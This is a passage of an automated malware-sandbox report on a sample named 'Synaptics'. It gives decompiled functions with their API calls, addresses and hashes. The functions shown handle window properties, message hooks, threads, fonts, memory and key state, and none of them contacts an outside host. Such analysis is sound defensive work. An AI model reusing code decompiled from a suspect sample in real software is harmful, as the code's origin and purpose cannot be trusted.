                                                                                                                                                                                          0x00438ce2
                                                                                                                                                                                          0x00438ce3
                                                                                                                                                                                          0x00438ce5
                                                                                                                                                                                          0x00438ce9
                                                                                                                                                                                          0x00438d00
                                                                                                                                                                                          0x00438d17
                                                                                                                                                                                          0x00438d37
                                                                                                                                                                                          0x00438d19
                                                                                                                                                                                          0x00438d29
                                                                                                                                                                                          0x00438d29
                                                                                                                                                                                          0x00438d17
                                                                                                                                                                                          0x00438d3f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                                                                                                                                                          • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                                                                                                                                                          • GetPropA.USER32 ref: 00438D22
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2582817389-0
                                                                                                                                                                                          • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                          • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00437E5C Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00437E5C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x49eb2c; // 0x22b12ac
					if(GlobalFindAtomA(E00404E80(_t5)) !=  *0x49eb26) {
						_t15 = E00437E28(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x49eb26 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                                                                                                                                                          0x00437e5c
                                                                                                                                                                                          0x00437e5e
                                                                                                                                                                                          0x00437e5f
                                                                                                                                                                                          0x00437e61
                                                                                                                                                                                          0x00437e65
                                                                                                                                                                                          0x00437e7c
                                                                                                                                                                                          0x00437e93
                                                                                                                                                                                          0x00437eae
                                                                                                                                                                                          0x00437e95
                                                                                                                                                                                          0x00437ea3
                                                                                                                                                                                          0x00437ea3
                                                                                                                                                                                          0x00437e93
                                                                                                                                                                                          0x00437eb5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                          • GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                          • GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2582817389-0
                                                                                                                                                                                          • Opcode ID: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                          • Instruction ID: 314671358fdb4042d771ff6fe008545e316f8929ccac966e84d460348b4874f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF037E2A0C22556D630F7B75C8292B259D8A1C3A6700557BF981E7346D53CFC00C2BE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458F44 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00458F44(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x49ebb8; // 0x22b1714
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x49ebd0 == 0) {
						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
						 *0x49ebd0 = _t2;
					}
					if( *0x49ebcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x49ebcc = _t2;
					}
					if( *0x49ebd4 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
						 *0x49ebd4 = _t2;
					}
				}
				return _t2;
			}





                                                                                                                                                                                          0x00458f45
                                                                                                                                                                                          0x00458f51
                                                                                                                                                                                          0x00458f5a
                                                                                                                                                                                          0x00458f6c
                                                                                                                                                                                          0x00458f71
                                                                                                                                                                                          0x00458f71
                                                                                                                                                                                          0x00458f7d
                                                                                                                                                                                          0x00458f87
                                                                                                                                                                                          0x00458f8c
                                                                                                                                                                                          0x00458f8c
                                                                                                                                                                                          0x00458f98
                                                                                                                                                                                          0x00458fab
                                                                                                                                                                                          0x00458fb0
                                                                                                                                                                                          0x00458fb0
                                                                                                                                                                                          0x00458f98
                                                                                                                                                                                          0x00458fb6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                                                                                                                                                          • SetWindowsHookExA.USER32 ref: 00458F6C
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00458FAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1195359707-0
                                                                                                                                                                                          • Opcode ID: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                          • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6c3b155004564497a934944e9fb1a4da8376012889de431701f3198bbbb3ef4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00460AA0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00460AA0(signed int __eax) {
				signed int _t1;
				signed int _t2;

				_t1 = __eax;
				_push(0);
				L00407638();
				_t2 = __eax;
				_push(0xc);
				_push(__eax);
				L00407380();
				_push(0xe);
				_push(__eax);
				L00407380();
				if(__eax * __eax > 8) {
					 *0x49c08f = 0;
				} else {
					 *0x49c08f = 1;
				}
				_push(_t2);
				_push(0);
				L00407888();
				return _t1;
			}





                                                                                                                                                                                          0x00460aa0
                                                                                                                                                                                          0x00460aa2
                                                                                                                                                                                          0x00460aa4
                                                                                                                                                                                          0x00460aa9
                                                                                                                                                                                          0x00460aab
                                                                                                                                                                                          0x00460aad
                                                                                                                                                                                          0x00460aae
                                                                                                                                                                                          0x00460ab5
                                                                                                                                                                                          0x00460ab7
                                                                                                                                                                                          0x00460ab8
                                                                                                                                                                                          0x00460ac3
                                                                                                                                                                                          0x00460ace
                                                                                                                                                                                          0x00460ac5
                                                                                                                                                                                          0x00460ac5
                                                                                                                                                                                          0x00460ac5
                                                                                                                                                                                          0x00460ad5
                                                                                                                                                                                          0x00460ad6
                                                                                                                                                                                          0x00460ad8
                                                                                                                                                                                          0x00460adf

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 120756276-0
                                                                                                                                                                                          • Opcode ID: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                          • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407A02 Relevance: 6.0, APIs: 4, Instructions: 12memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407A02(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                                                                                                                                          0x00407a07
                                                                                                                                                                                          0x00407a0e
                                                                                                                                                                                          0x00407a13
                                                                                                                                                                                          0x00407a19
                                                                                                                                                                                          0x00407a1e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocHandleWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2210401237-0
                                                                                                                                                                                          • Opcode ID: ae79925c9fa2c1acad6e66d7e44aac30114f4fe4b995d9eeb3d806881b7572ac
                                                                                                                                                                                          • Instruction ID: 0cc1a46e5979fcb792dc000e61484a9c8bca995a2772b30d6e164c9035daf03f
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae79925c9fa2c1acad6e66d7e44aac30114f4fe4b995d9eeb3d806881b7572ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AB008E4D5820539EA5433B64C0AD3B115C9A946093804A6E7840FA2C6D87DB846407A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00424E24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00424E24(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x424fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E00424FB4);
					return E004049E4( &_v80, 3);
				} else {
					_t76 =  *0x49e8e0; // 0x22b0a30
					E00424168(_t76);
					_push(_t137);
					_push(0x424f85);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404C24( &_v72, _v8 + 0x1b);
						if(E00408F88(_v72, "Default") != 0) {
							E00404C24( &_v80, _v8 + 0x1b);
							E0040A020( &(_v68.lfFaceName), _v80);
						} else {
							E00404C24( &_v76, "\rMS Sans Serif");
							E0040A020( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425108(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(E00424F8C);
					_t81 =  *0x49e8e0; // 0x22b0a30
					return E00424174(_t81);
				}
			}
















                                                                                                                                                                                          0x00424e25
                                                                                                                                                                                          0x00424e27
                                                                                                                                                                                          0x00424e2d
                                                                                                                                                                                          0x00424e30
                                                                                                                                                                                          0x00424e33
                                                                                                                                                                                          0x00424e36
                                                                                                                                                                                          0x00424e3a
                                                                                                                                                                                          0x00424e3b
                                                                                                                                                                                          0x00424e40
                                                                                                                                                                                          0x00424e43
                                                                                                                                                                                          0x00424e49
                                                                                                                                                                                          0x00424e53
                                                                                                                                                                                          0x00424f97
                                                                                                                                                                                          0x00424f9a
                                                                                                                                                                                          0x00424fac
                                                                                                                                                                                          0x00424e59
                                                                                                                                                                                          0x00424e59
                                                                                                                                                                                          0x00424e5e
                                                                                                                                                                                          0x00424e65
                                                                                                                                                                                          0x00424e66
                                                                                                                                                                                          0x00424e6b
                                                                                                                                                                                          0x00424e6e
                                                                                                                                                                                          0x00424e78
                                                                                                                                                                                          0x00424e84
                                                                                                                                                                                          0x00424e89
                                                                                                                                                                                          0x00424e8e
                                                                                                                                                                                          0x00424e93
                                                                                                                                                                                          0x00424e9d
                                                                                                                                                                                          0x00424ea8
                                                                                                                                                                                          0x00424e9f
                                                                                                                                                                                          0x00424e9f
                                                                                                                                                                                          0x00424e9f
                                                                                                                                                                                          0x00424eb9
                                                                                                                                                                                          0x00424ec6
                                                                                                                                                                                          0x00424ed3
                                                                                                                                                                                          0x00424edc
                                                                                                                                                                                          0x00424ee8
                                                                                                                                                                                          0x00424efc
                                                                                                                                                                                          0x00424f21
                                                                                                                                                                                          0x00424f2c
                                                                                                                                                                                          0x00424efe
                                                                                                                                                                                          0x00424f06
                                                                                                                                                                                          0x00424f11
                                                                                                                                                                                          0x00424f11
                                                                                                                                                                                          0x00424f31
                                                                                                                                                                                          0x00424f35
                                                                                                                                                                                          0x00424f39
                                                                                                                                                                                          0x00424f44
                                                                                                                                                                                          0x00424f46
                                                                                                                                                                                          0x00424f4e
                                                                                                                                                                                          0x00424f48
                                                                                                                                                                                          0x00424f4a
                                                                                                                                                                                          0x00424f54
                                                                                                                                                                                          0x00424f4c
                                                                                                                                                                                          0x00424f5a
                                                                                                                                                                                          0x00424f5a
                                                                                                                                                                                          0x00424f4a
                                                                                                                                                                                          0x00424f6a
                                                                                                                                                                                          0x00424f6a
                                                                                                                                                                                          0x00424f6f
                                                                                                                                                                                          0x00424f72
                                                                                                                                                                                          0x00424f75
                                                                                                                                                                                          0x00424f7a
                                                                                                                                                                                          0x00424f84
                                                                                                                                                                                          0x00424f84

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5,004235EC,00000001), ref: 0042416C
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateCriticalEnterFontIndirectSection
                                                                                                                                                                                          • String ID: MS Sans Serif$Default
                                                                                                                                                                                          • API String ID: 2931345757-2137701257
                                                                                                                                                                                          • Opcode ID: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                          • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D5A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40d75b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x49dbd4; // 0x407ddc
					E00406A70(_t52,  &_v8);
				} else {
					_t86 =  *0x49de48; // 0x407dd4
					E00406A70(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x49dbfc; // 0x407d7c
					E00406A70(_t60,  &_v372);
					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404C30( &_v340, 0x105,  &_v297);
					E00409E18(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x49dcbc; // 0x407e84
					E00406A70(_t82,  &_v344);
					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040D762);
				E004049C0( &_v372);
				E004049E4( &_v344, 3);
				return E004049C0( &_v8);
			}

































                                                                                                                                                                                          0x0040d5a0
                                                                                                                                                                                          0x0040d5ad
                                                                                                                                                                                          0x0040d5b3
                                                                                                                                                                                          0x0040d5b9
                                                                                                                                                                                          0x0040d5bf
                                                                                                                                                                                          0x0040d5c5
                                                                                                                                                                                          0x0040d5ca
                                                                                                                                                                                          0x0040d5cb
                                                                                                                                                                                          0x0040d5d0
                                                                                                                                                                                          0x0040d5d3
                                                                                                                                                                                          0x0040d5d9
                                                                                                                                                                                          0x0040d5e0
                                                                                                                                                                                          0x0040d5f4
                                                                                                                                                                                          0x0040d5f9
                                                                                                                                                                                          0x0040d5e2
                                                                                                                                                                                          0x0040d5e5
                                                                                                                                                                                          0x0040d5ea
                                                                                                                                                                                          0x0040d5ea
                                                                                                                                                                                          0x0040d5fe
                                                                                                                                                                                          0x0040d60b
                                                                                                                                                                                          0x0040d617
                                                                                                                                                                                          0x0040d6d3
                                                                                                                                                                                          0x0040d6d9
                                                                                                                                                                                          0x0040d6e3
                                                                                                                                                                                          0x0040d6e9
                                                                                                                                                                                          0x0040d6f0
                                                                                                                                                                                          0x0040d6f6
                                                                                                                                                                                          0x0040d70c
                                                                                                                                                                                          0x0040d711
                                                                                                                                                                                          0x0040d723
                                                                                                                                                                                          0x0040d63a
                                                                                                                                                                                          0x0040d63d
                                                                                                                                                                                          0x0040d643
                                                                                                                                                                                          0x0040d65b
                                                                                                                                                                                          0x0040d66c
                                                                                                                                                                                          0x0040d677
                                                                                                                                                                                          0x0040d67d
                                                                                                                                                                                          0x0040d687
                                                                                                                                                                                          0x0040d68d
                                                                                                                                                                                          0x0040d694
                                                                                                                                                                                          0x0040d69a
                                                                                                                                                                                          0x0040d6b0
                                                                                                                                                                                          0x0040d6b5
                                                                                                                                                                                          0x0040d6c7
                                                                                                                                                                                          0x0040d6cc
                                                                                                                                                                                          0x0040d72c
                                                                                                                                                                                          0x0040d72f
                                                                                                                                                                                          0x0040d732
                                                                                                                                                                                          0x0040d73d
                                                                                                                                                                                          0x0040d74d
                                                                                                                                                                                          0x0040d75a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                                                                                                                          • String ID: |}@
                                                                                                                                                                                          • API String ID: 902310565-1323765261
                                                                                                                                                                                          • Opcode ID: 391e2ad55baf29e5d670faad93db4e8497922baa77aa9bdc663849a163ee543b
                                                                                                                                                                                          • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                                                                                                                                                          • Opcode Fuzzy Hash: 391e2ad55baf29e5d670faad93db4e8497922baa77aa9bdc663849a163ee543b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044E02C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0044E02C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
